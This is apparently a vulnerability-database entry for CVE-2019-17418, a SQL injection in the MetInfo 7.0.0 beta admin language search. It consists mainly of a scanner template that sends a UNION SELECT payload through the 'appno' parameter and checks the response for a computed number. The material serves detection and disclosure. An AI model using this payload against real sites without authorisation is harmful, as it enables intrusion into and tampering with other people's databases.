CVE-2019-17418: MetInfo 7.0.0 beta - SQL Injection

日期: 2025-08-01 | 影响软件: MetInfo | POC: 已公开

漏洞描述

MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).

PoC代码[已公开]

id: CVE-2019-17418

info:
  name: MetInfo 7.0.0 beta - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/evi1code/Just-for-fun/issues/2
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17418
    - https://github.com/0ps/pocassistdb
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-17418
    cwe-id: CWE-89
    epss-score: 0.92822
    epss-percentile: 0.99753
    cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: metinfo
    product: metinfo
  tags: cve,cve2019,metinfo,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "43865094559"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100db4d4eaaad25c22a73560389e09c25e1087bb938bf928cf4c737f7f4dfeb93f3022100db6b62c2a0396dc78748d564c1e02031f0a036ee89224c206afa640dd2ba75ac:922c64590222798bb761d5b6d8e72950

相关漏洞推荐